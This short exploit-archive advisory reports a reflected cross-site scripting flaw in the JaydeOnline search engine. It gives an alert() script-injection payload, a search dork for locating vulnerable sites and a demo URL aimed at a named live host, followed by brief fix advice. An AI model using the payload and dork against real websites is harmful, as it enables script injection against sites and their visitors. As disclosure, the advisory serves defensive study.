Home / exploitsPDF  

JaydeOnline Search Engine Cross Site Scripting

Posted on 15 July 2011

<------------------- header data start ------------------- > ############################################################# JaydeOnline Search Engine XSS Vulnerability ############################################################# # Author : SOLVER ~ Bug Researchers # Date : 13.06.2011 # Name : Jayde Online Network # Bug Type : XSS (Cross Site Scripting) # Infection : Hedef sistem uzerinde zararli Javascript kodlari calistirilabilir. # Explanation : JaydeOnline arama motoru sistemini kullanan web sitelerinde gorulen bir aciktir. # Example Vuln : <BODY%20ONLOAD=alert("SOLVER")> [+] Dork:intext:"JaydeOnline Inc" [+] Demo: http://web1.exactseek.com/webclient/?q=<BODY%20ONLOAD=alert("SOLVER")> # Bug Fix Advice : Zararli Karakterler Filtrenmelidir. #############################################################

 

TOP